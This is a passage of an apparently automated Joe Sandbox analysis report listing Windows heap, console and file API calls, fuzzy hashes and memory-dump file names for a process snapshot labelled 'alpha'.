                                                                                                                    • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3512109576-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB6D0
                                                                                                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB6E7
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB701
                                                                                                                    • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF789BCAF82), ref: 00007FF789BCB715
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$Process$AllocSize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2549470565-0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 22757656-0
                                                                                                                    • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                    • Instruction ID: 8a90d41b50c92e4d06614146a6bfc27181c422ceb85b6e7c9014d4731287b3ff
                                                                                                                    • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                                    • Instruction Fuzzy Hash: A1112E71A1864987E7506F24E44837DBAB0FB89FA5FA44734D62A473D0DF3D9449CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56C5
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56D9
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE56FD
                                                                                                                    • RtlFreeHeap.NTDLL(?,?,00000028,00007FF789BE5433,?,?,?,00007FF789BE69B8,?,?,?,?,?,00007FF789BD8C39), ref: 00007FF789BE5711
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$FreeProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3859560861-0
                                                                                                                    • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                    • Instruction ID: d047d02ab10545f19e0d7d112ef87390b93682f133160d4cbe0b4f02ebfff3d0
                                                                                                                    • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                                    • Instruction Fuzzy Hash: CA11EC72A04B95CADB009F56E4440ADBBB0F75DF85B998135DB4E03B18EF38E456C750
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleMode_get_osfhandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1606018815-0
                                                                                                                    • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                    • Instruction ID: 2a60d51aa00c3d334817cc2f7f6f41368badf87669877e9b166c541aade4c68c
                                                                                                                    • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                                    • Instruction Fuzzy Hash: E5F0F231A24A82CBD6046F10E844279BE70FB8AF43F95A228DA0A02394EF3CD008CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleTitle
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 3358957663-3695764949
                                                                                                                    • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                    • Instruction ID: 646374a0ed368522b8caf40984f5b25c294191b618e7bb202494354d1578c4da
                                                                                                                    • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                                                                                                                    • Instruction Fuzzy Hash: 80319021A0964A82EA44BF52A844078EEB4FF49FE6FA45535DE1E077D5DF3CE841C324
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsnicmpswscanf
                                                                                                                    • String ID: :EOF
                                                                                                                    • API String ID: 1534968528-551370653
                                                                                                                    • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                    • Instruction ID: 90a07ccb2dcd07cebf43d4d04d71ce76afb848d206f64974b86aacceafbfb006
                                                                                                                    • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                                                                                                                    • Instruction Fuzzy Hash: 5431A271A0D64A8AFB54BF55E4842B8FAB0FF45F62FE44031DA4D06290DF2CE942C760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 3$3
                                                                                                                    • API String ID: 0-2538865259
                                                                                                                    • Opcode ID: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                    • Instruction ID: 74c151d912120985f0b44087bde21283383c215998ff22fdaf03a9ee2c543326
                                                                                                                    • Opcode Fuzzy Hash: b8f86acd81ff1c6da407d28336be8d8a1ddaaa1636690dcce93971c28c339212
                                                                                                                    • Instruction Fuzzy Hash: 46013931D0A58A8AF394BF61D888278FA70BF80B27FF40135D40E015A2DF2E6585CA60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06D6
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD06F0
                                                                                                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD074D
                                                                                                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF789BCB4DB), ref: 00007FF789BD0762
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1617791916-0
                                                                                                                    • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                    • Instruction ID: 359634feeda40882ccdad0a3af20f993fbffb9be1b8cb8178b33350d32e73de3
                                                                                                                    • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                                                                                                                    • Instruction Fuzzy Hash: 00413972A0968686EA55AF21E448179FBB0FF85F82FE48134DA4E07794DF3DE540CB60
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%